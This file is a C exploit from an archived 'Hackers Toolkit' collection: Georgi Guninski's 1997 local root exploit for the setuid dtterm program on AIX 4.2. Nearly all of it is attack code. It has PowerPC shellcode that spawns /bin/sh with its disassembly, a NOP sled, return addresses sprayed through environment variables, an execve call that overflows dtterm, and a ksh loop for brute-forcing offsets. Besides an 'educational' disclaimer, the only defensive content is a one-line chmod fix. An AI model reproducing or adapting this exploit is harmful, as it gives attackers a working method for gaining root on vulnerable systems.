home *** CD-ROM | disk | FTP | other *** search
/ Hackers Toolkit v2.0 / Hackers_Toolkit_v2.0.iso / HTML / archive / Unix / c-src / aix_dtterm.c < prev    next >
C/C++ Source or Header  |  1999-11-04  |  5KB  |  193 lines

  1. /*----cut here---------
  2.  AIX 4.2,(others?) dtterm exploit by Georgi Guninski
  3.  
  4. ----------------------------------------
  5. DISCLAIMER
  6.  
  7.  This program is for educational purpose ONLY. Do not use it without
  8. permission.
  9.  The usual standard disclaimer applies, especially the fact that Georgi
  10. Guninski
  11.  is not liable for any damages caused by direct or  indirect use of
  12.  the information or functionality provided by this program.
  13.  Georgi Guninski, his employer or any Internet provider bears NO
  14. responsibility for content
  15.  or misuse of this program or any derivatives thereof.
  16.  By using this program you accept the fact that any damage (dataloss,
  17. system
  18.  crash, system compromise, etc.) caused by the use of this program is not
  19.  Georgi Guninski's responsibility.
  20.  
  21. In case you distribute this, please keep the disclaimer and my addresses.
  22. -----------------------------------------
  23. Use the IBM C compiler.
  24. Compile with: cc -g aixdtterm.c
  25. Some brute forcing may help.
  26. DISPLAY should be set to a valid display.
  27. SOLUTION: #chmod -s /usr/dt/bin/dtterm          ; dtterm seems to continue
  28. working?
  29. -----------------
  30. Georgi Guninski
  31.  guninski@hotmail.com
  32.  sgg@vmei.acad.bg
  33.  guninski@linux2.vmei.acad.bg
  34.  http://www.geocities.com/ResearchTriangle/1711
  35.  
  36. Suggestions,comments and job offers are welcome!
  37. 20-MAY-97
  38. */
  39. #include <stdio.h>
  40. #include <stdlib.h>
  41. #include <string.h>
  42.  
  43.  
  44. char prog[100]="/usr/dt/bin/dtterm";
  45. char prog2[30]="dtterm";
  46. extern int execv();
  47.  
  48. char *createvar(char *name,char *value)
  49. {
  50. char *c;
  51. int l;
  52. l=strlen(name)+strlen(value)+4;
  53. if (! (c=malloc(l))) {perror("error allocating");exit(2);};
  54. strcpy(c,name);
  55. strcat(c,"=");
  56. strcat(c,value);
  57. putenv(c);
  58. return c;
  59. }
  60.  
  61. /*The program*/
  62. main(int argc,char **argv,char **env)
  63. {
  64. /*The code*/
  65. unsigned int code[]={
  66. 0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 ,
  67. 0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c ,
  68. 0x90610444 , 0x3c602f62 , 0x6063696e , 0x90610438 ,
  69. 0x3c602f73 , 0x60636801 , 0x3863ffff , 0x9061043c ,
  70. 0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 ,
  71. 0x7c0903a6 , 0x4e800420, 0x0
  72. };
  73. /* disassembly
  74. 7c0802a6        mfspr   r0,LR
  75. 9421fbb0        stu     SP,-1104(SP) --get stack
  76. 90010458        st      r0,1112(SP)
  77. 3c60f019        cau     r3,r0,0xf019 --CTR
  78. 60632c48        lis     r3,r3,11336  --CTR
  79. 90610440        st      r3,1088(SP)
  80. 3c60d002        cau     r3,r0,0xd002 --TOC
  81. 60634c0c        lis     r3,r3,19468  --TOC
  82. 90610444        st      r3,1092(SP)
  83. 3c602f62        cau     r3,r0,0x2f62 --'/bin/sh\x01'
  84. 6063696e        lis     r3,r3,26990
  85. 90610438        st      r3,1080(SP)
  86. 3c602f73        cau     r3,r0,0x2f73
  87. 60636801        lis     r3,r3,26625
  88. 3863ffff        addi    r3,r3,-1
  89. 9061043c        st      r3,1084(SP) --terminate with 0
  90. 30610438        lis     r3,SP,1080
  91. 7c842278        xor     r4,r4,r4    --argv=NULL
  92. 80410440        lwz     RTOC,1088(SP)
  93. 80010444        lwz     r0,1092(SP) --jump
  94. 7c0903a6        mtspr   CTR,r0
  95. 4e800420        bctr              --jump
  96. */
  97.  
  98. #define MAXBUF 600
  99. unsigned int buf[MAXBUF];
  100. unsigned int frame[MAXBUF];
  101. unsigned int i,nop,mn;
  102. int max;
  103. int QUIET=0;
  104. int dobuf=0;
  105. unsigned int toc;
  106. unsigned int eco;
  107. unsigned int *pt;
  108. char *t;
  109. int ch;
  110. unsigned int reta; /* return address */
  111. int corr=1000;
  112. char *args[4];
  113. char *arg1="-ms";
  114. char *newenv[8];
  115. int startwith=0;
  116.  
  117. mn=200;
  118. max=300;
  119.  
  120. if (argc>1)
  121.         corr = atoi(argv[1]);
  122.  
  123. pt=(unsigned *) &execv;
  124. toc=*(pt+1);
  125. eco=*pt;
  126.  
  127. if ( ((mn+strlen((char*)&code)/4)>max) || (max>MAXBUF) )
  128. {
  129.         perror("Bad parameters");
  130.         exit(1);
  131. }
  132.  
  133. #define OO 7
  134. *((unsigned short *)code + OO + 2)=(unsigned short) (toc & 0x0000ffff);
  135. *((unsigned short *)code + OO)=(unsigned short) ((toc >> 16) & 0x0000ffff);
  136. *((unsigned short *)code + OO + 8 )=(unsigned short) (eco & 0x0000ffff);
  137. *((unsigned short *)code + OO + 6 )=(unsigned short) ((eco >> 16) &
  138. 0x0000ffff);
  139.  
  140. reta=startwith ? (unsigned) &buf[mn]+corr : (unsigned)&buf[0]+corr;
  141.  
  142. for(nop=0;nop<mn;nop++)
  143.  buf[nop]=startwith ? reta : 0x4ffffb82;        /*NOP*/
  144. strcpy((char*)&buf[nop],(char*)&code);
  145. i=nop+strlen( (char*) &code)/4-1;
  146.  
  147. if( !(reta & 0xff) || !(reta && 0xff00) || !(reta && 0xff0000)
  148.         || !(reta && 0xff000000))
  149. {
  150. perror("Return address has zero");exit(5);
  151. }
  152.  
  153. while(i++<max)
  154.  buf[i]=reta;
  155. buf[i]=0;
  156.  
  157. for(i=0;i<max-1;i++)
  158.  frame[i]=reta;
  159. frame[i]=0;
  160.  
  161. if(QUIET) {puts((char*)&buf);fflush(stdout);exit(0);};
  162.  
  163. /* 4 vars 'cause the correct one should be aligned at 4bytes boundary */
  164. newenv[0]=createvar("EGGSHEL",(char*)&buf[0]);
  165. newenv[1]=createvar("EGGSHE2",(char*)&buf[0]);
  166. newenv[2]=createvar("EGGSHE3",(char*)&buf[0]);
  167. newenv[3]=createvar("EGGSHE4",(char*)&buf[0]);
  168.  
  169.  
  170. newenv[4]=createvar("DISPLAY",getenv("DISPLAY"));
  171. newenv[5]=NULL;
  172.  
  173. args[0]=prog2;
  174. args[1]=arg1;
  175. args[2]=(char*)&frame[0]; /* Just frame pointers */
  176. puts("Start...");/*Here we go*/
  177. execve(prog,args,newenv);
  178. perror("Error executing execve \n");
  179. }
  180.  
  181. /*
  182. -------sometimes this helps-----------------------
  183. #!/bin/ksh
  184. L=20
  185. O=40
  186. while [ $L -lt 12000 ]
  187. do
  188. echo $L
  189. L=`expr $L + 144`
  190. ./a.out $L
  191. done
  192. */
  193.